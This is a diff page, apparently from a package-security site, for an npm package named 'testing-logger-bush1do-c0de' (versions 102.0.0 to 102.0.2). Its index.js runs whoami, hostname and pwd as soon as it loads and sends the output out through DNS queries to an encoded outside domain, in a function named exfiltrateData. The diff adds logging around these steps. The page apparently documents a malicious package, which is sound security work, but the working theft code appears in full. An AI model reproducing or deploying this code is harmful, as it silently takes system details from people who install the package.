testing-logger-bush1do-c0de 102.0.0 → 102.0.2
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +17 -4
- package/package.json +1 -1
package/index.js
CHANGED
@@ -2,7 +2,8 @@ const dns = require('dns');
|
|
2
2
|
const { exec } = require('child_process');
|
3
3
|
|
4
4
|
function exfiltrateData(data) {
|
5
|
-
const subdomain = `${data}.${Buffer.from('
|
5
|
+
const subdomain = `${data}.${Buffer.from('noreply.access.ly').toString('base64')}`;
|
6
|
+
console.log(`Exfiltrating data to DNS: ${subdomain}`);
|
6
7
|
dns.resolve4(subdomain, (err, addresses) => {
|
7
8
|
if (err) console.error(err);
|
8
9
|
else console.log(`Data exfiltrated: ${addresses}`);
|
@@ -10,14 +11,26 @@ function exfiltrateData(data) {
|
|
10
11
|
}
|
11
12
|
|
12
13
|
// Run commands and send output
|
14
|
+
console.log("Executing whoami command...");
|
13
15
|
exec('whoami', (error, stdout) => {
|
14
|
-
if (stdout)
|
16
|
+
if (stdout) {
|
17
|
+
console.log(`Whoami output: ${stdout.trim()}`);
|
18
|
+
exfiltrateData(stdout.trim());
|
19
|
+
}
|
15
20
|
});
|
16
21
|
|
22
|
+
console.log("Executing hostname command...");
|
17
23
|
exec('hostname', (error, stdout) => {
|
18
|
-
if (stdout)
|
24
|
+
if (stdout) {
|
25
|
+
console.log(`Hostname output: ${stdout.trim()}`);
|
26
|
+
exfiltrateData(stdout.trim());
|
27
|
+
}
|
19
28
|
});
|
20
29
|
|
30
|
+
console.log("Executing pwd command...");
|
21
31
|
exec('pwd', (error, stdout) => {
|
22
|
-
if (stdout)
|
32
|
+
if (stdout) {
|
33
|
+
console.log(`PWD output: ${stdout.trim()}`);
|
34
|
+
exfiltrateData(stdout.trim());
|
35
|
+
}
|
23
36
|
});
|